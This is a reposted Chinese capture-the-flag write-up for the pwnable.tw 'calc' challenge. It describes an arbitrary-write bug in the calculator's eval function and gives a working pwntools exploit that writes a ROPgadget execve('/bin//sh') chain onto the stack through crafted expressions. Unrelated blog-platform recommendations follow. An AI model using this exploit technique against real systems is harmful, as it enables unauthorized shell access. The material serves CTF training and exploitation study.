pwnable.tw calc

最新推荐文章于 2023-09-22 14:19:55 发布
最新推荐文章于 2023-09-22 14:19:55 发布
阅读量99 收藏
点赞数
原文链接:http://www.cnblogs.com/snip3r/p/10402528.html
版权

题目代码量比较大(对于菜鸡我来说orz),找了很久才发现一个能利用的漏洞

运行之发现是一个计算器的程序,简单测试下发现当输入的操作数超过10位时会有一个整型溢出

这里调试了一下发现是printf("%d",num[num-1])时要输出的结果超过了2^31,2147483648即0x80000000,所以这应该算是一个bug并不是一个可利用的漏洞(32位程序最大输出2^31的原因是int类型最高位是符号标志位)

下面我们逆向一下整个程序找到真正可利用的漏洞

其中get_expr函数在读入时会进行字符的过滤,只会读取+-*/%和数字。可以看到get_expr和parse_expr前都会进行expression和num栈空间清零,这里num记录的是进行parse_expr时数字的总个数

下面看一下parse_expr函数

以下根据符号求表达式值过程省略,可以看到get_expr函数进行表达式求值处理的过程也是不存在漏洞的。

这里真正存在的漏洞是eval中的一个任意地址写的漏洞,我们在calc的返回地址栈空间利用这个任意地址写构造一个ROP即可

 

这里最暴力的方法是利用ROPgadget生成ropchain,然后利用eval的任意地址写直接修改内存即可

from pwn import *



context.log_level='DEBUG'

r=remote('chall.pwnable.tw',10100)



r.recv()



from struct import pack



# Padding goes here

p = ''



p += pack('<I', 0x080701aa) # pop edx ; ret

p += pack('<I', 0x080ec060) # @ .data

p += pack('<I', 0x0805c34b) # pop eax ; ret

p += '/bin'

p += pack('<I', 0x0809b30d) # mov dword ptr [edx], eax ; ret

p += pack('<I', 0x080701aa) # pop edx ; ret

p += pack('<I', 0x080ec064) # @ .data + 4

p += pack('<I', 0x0805c34b) # pop eax ; ret

p += '//sh'

p += pack('<I', 0x0809b30d) # mov dword ptr [edx], eax ; ret

p += pack('<I', 0x080701aa) # pop edx ; ret

p += pack('<I', 0x080ec068) # @ .data + 8

p += pack('<I', 0x080550d0) # xor eax, eax ; ret

p += pack('<I', 0x0809b30d) # mov dword ptr [edx], eax ; ret

p += pack('<I', 0x080481d1) # pop ebx ; ret

p += pack('<I', 0x080ec060) # @ .data

p += pack('<I', 0x080701d1) # pop ecx ; pop ebx ; ret

p += pack('<I', 0x080ec068) # @ .data + 8

p += pack('<I', 0x080ec060) # padding without overwrite ebx

p += pack('<I', 0x080701aa) # pop edx ; ret

p += pack('<I', 0x080ec068) # @ .data + 8

p += pack('<I', 0x080550d0) # xor eax, eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x0807cb7f) # inc eax ; ret

p += pack('<I', 0x08049a21) # int 0x80



def set_val(addr):

    r.sendline('+'+str(addr))

    val=int(r.recv(100))

    if val>0:

        r.sendline('+'+str(addr)+'-'+str(val)+'+'+str(u32(p[(addr-361)*4:(addr-361+1)*4])))

    else:

        r.sendline('+'+str(addr)+'+'+str(-val)+'+'+str(u32(p[(addr-361)*4:(addr-361+1)*4])))

    r.recv()



for i in range(361,361+len(p)/4):

    set_val(i)



r.interactive()

 

转载于:https://www.cnblogs.com/snip3r/p/10402528.html

weixin_30530339
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 591
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
pwnable.tw calc writeup
jmp esp
09-27 1645
题目main:int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14, timeout); alarm(60); puts("=== Welcome to SECPROG calculator ==="); fflush(stdout); calc(); return puts
pwnable.twcalc
qq_61670993的博客
09-22 76
逻辑错误导致数组越界
pwnable.tw-calc详解
qq_35661990的博客
01-06 923
重点需要的知识:ROP链的构造、栈中ebp和esp的变换 这题颠覆了我原本以为pwn都是各种套路的思想,和pwn只需要关注危险函数的思想,栈溢出并不是只有各种ret技术,恐怕堆溢出也不仅仅局限于各种heap of技术,那些只是基础。 int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14,...
advanced.scientific.calculator.calc991.plus(1).apk
09-21
advanced.scientific.calculator.calc991.plus(1).apk
sm.rar_calc
09-14
"sm.rar_calc" 是一个程序,它专门用于执行符号法(Symplex Method)的计算。符号法,又称单纯形法,是一种线性规划问题求解的优化算法,由美国数学家乔治·丹齐格在1947年提出。线性规划是运筹学的一个重要分支,...
my_calc.rar_calc
09-24
首先,我们来理解“my_calc.rar_calc”这一标题。这里的“my_calc”是开发者为这个科学计算器项目所起的名称,可能代表“我的计算器”之意。而“rar_calc”则可能表明这个项目是以RAR压缩格式存储,且包含一个名为...
Mtasan1.com Calc-crx插件
04-05
语言:English chrome扩展的mtasan1计算器,通知用户在本网站上花费的时间。 当你花每10秒钟收集时。 通知通过每10秒收集一次。... 访问者可以使用自由方式在自己的地区使用我们的服务。 每天我们都会在不同国家提供更...
calc_angle.rar_calc wheel angle
09-24
"calc_angle.rar_calc wheel angle" 提供的资源显然与计算车轮的角度有关,这可能是为了分析车辆动态、机械设计或者游戏引擎中的物理模拟。"CALC INTERCEPT ANGLE" 进一步暗示我们这个程序或脚本用于计算截距角,这...
pwnable.tw calc 经验总结
qq_43189757的博客
10-22 748
代码写的少, 弄清楚程序逻辑都得盯好久… 程序逻辑: 如题目名字所写, 程序的功能就是实现一个简单计算器的功能 相关函数介绍: 1.get_expr 函数功能为读取计算的表达式, 运算符只包括+ , - , *, /, %五种, 除了运算符和参加运算的数据之外的字符都不会被读取 2.parse_expr 函数功能为对表达式进行解析 传入的参数a1 为表达式的地址 a2 为calc函数中变量v...
pwnable.tw writeup
钞sir的博客
02-27 4058
start 这道题是静态编译的,或者可以理解是就是直接用汇编写的,所以这个程序很小,没有可以利用的函数; sir@sir-PC:~/desktop$ objdump -R start start: 文件格式 elf32-i386 objdump: start:不是动态对象 objdump: start: 无效的操作 反汇编代码: sir@sir-PC:~/desktop$ objdu...
pwnable.tw 题解笔记
我多么希望明天有太阳,来灼烧我腐烂的梦想
09-05 409
题目 orw 考察写shellcode 题目只允许使用read/write/open. 系统调用表: https://introspelliam.github.io/2017/08/06/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E7%BA%A6%E5%AE%9A/ #coding=utf-8 from pwn import * p = remote('chal...
pwnable.tw orw writeup
jmp esp
09-27 1862
题目题目比较简单就不复制了,首先seccomp设置了白名单,然后输入0xc8长度shellcode,直接跳到shellcode执行。分析既然是练习,就要彻底一点。 首先是seccomp dump的问题,目前采用的方法是IDApython脚本dump数据下来,然后输入scmp_bpf_disasm。IDApython的文档非常诡异,函数没有说明,函数的参数也不能直接看出来,所以搜了很长时间找了一个别
bugku-游戏过关
qq_35661990的博客
11-06 1159
pwnable.twcalcpwnable.kr的memcpy难度提升得让我突然像是到了一片知识的孤岛上,举目所望是无尽的未知。才发现自己的汇编基础实在薄弱,另外只通过0day安全分析学了windows的堆管理,对linux的堆管理实在是所知甚少,鉴于此,在补足基础的时候,打算做一下bugku上的逆向维持一下基本的做题感觉。 bugku逆向的前三题都是用IDA打开就看到答案了,所以从游戏过关...
pwnable.tw记录之applestore
qq_35429581的博客
10-31 1412
耐下心用ida分析: 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:char* name,int price,struct * bk ,struct * fd   ,由insert()函数将当前商品的结构体插入链表尾部。链表的起始位置记录在全局变量 myCart(0x0804B068)中。 delete函数进行链表的拆卸: 一开始觉
全国计算机三级(网络技术)做题技巧
07-22
全国计算机三级(网络技术)做题技巧
记录 cocos 开发问题 ,微信 wx.xxx函数 报找不到名称“wx”
最新发布
07-22
wx api 文件
20231108-173536 时间箭贴板
07-22
时间粘贴小工具 启动后点击回车 可以得到时间字符串 直接粘贴可用
calc1.l, calc1.y, calc2.l, calc2.y
07-25
### 回答1: calc1.l、calc1.y、calc2.l和calc2.y是一种被称为Lex和Yacc的工具组合,用于生成词法分析器和语法分析器。 calc1.l文件是Lex文件,包含对输入文本进行词法分析的规则。这些规则定义了如何将输入文本切分成一个个词法单元,例如标识符、关键字、运算符等。calc1.l文件还可以执行词法单元的一些简单处理,例如去除空格、注释等。 calc1.y文件是Yacc文件,包含了对输入文本进行语法分析的规则。这些规则描述了输入文本的语法结构,即如何将词法单元按照语法规则组合成整体的语法结构。calc1.y文件还可以执行一些语义动作,例如生成抽象语法树,以便进行后续的语义分析和代码生成。 calc2.l和calc2.y文件类似于calc1.l和calc1.y文件,但可能包含不同的规则和语法结构。这取决于具体的应用场景和需求。例如,calc2.l和calc2.y可以用于解析另一种编程语言或特定的文件格式。 综上所述,calc1.l、calc1.y、calc2.l和calc2.y是用于生成词法分析器和语法分析器的工具文件。它们通过定义词法规则和语法规则,帮助开发人员构建用于编译、解析和处理特定文本的工具。 ### 回答2: calc1.l, calc1.y, calc2.l, calc2.y 是一类用于构建计算器的代码文件。 calc1.l 是一个词法分析器(lexer)文件。它使用 Flex 工具来处理输入的字符流,并将其转化为一个单个单词(token)序列。词法分析器负责识别输入中的每个单词及其对应的类型,如关键字、标识符、运算符、常量等。 calc1.y 是一个语法分析器(parser)文件。它使用 Yacc 或 Bison 工具来处理由词法分析器生成的单词序列,并根据语法规则构造语法树。语法分析器负责检查输入的语法是否符合指定的语法规则,并将其转换为可执行代码。 calc2.l 和 calc2.y 可能是 calc1.l 和 calc1.y 的变种,或者是 calc1.l 和 calc1.y 的升级版本。这两个文件通常表示了对计算器的改进或扩展。可能通过添加更多的词汇、引入更复杂的语法规则、支持新的操作符或函数等方式,提供了更丰富的功能和更高的灵活性。 以上就是关于 calc1.l, calc1.y, calc2.l, calc2.y 的简要介绍。这些文件在构建计算器这类程序中起到重要的作用,使得输入的表达式能够被正确解析和计算。 ### 回答3: calc1.l、calc1.y、calc2.l、calc2.y是四个文件的名称,它们通常被用于构建基于词法分析和语法分析的编译器或解释器。 calc1.l文件通常是使用Lex工具生成的词法分析器。这个文件定义了一系列正则表达式规则,用来匹配输入源代码中的词法单元。它会将源代码中的文本分解成一系列标记,例如关键字、标识符、运算符等。这些标记将被传递给calc1.y文件进行语法分析。 calc1.y文件通常是使用Yacc或Bison工具生成的语法分析器。这个文件定义了代码语法的规则和语义动作。它将接收从calc1.l文件传递过来的标记流,并根据语法规则进行分析和解释。它会构建一个语法树,用来表示源代码的结构,并根据语义动作对其进行处理,例如执行计算、生成中间代码等。 类似地,calc2.l和calc2.y文件也是词法分析器和语法分析器。它们可能与calc1.l和calc1.y文件有一些细微的差别,例如支持不同的语法规则、词法单元等。这些文件之间的区别往往取决于具体的编程语言或领域需求。 总之,这四个文件是构建词法分析器和语法分析器所必需的组成部分。它们共同协作,将源代码进行分析和解释,从而实现编译器或解释器的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值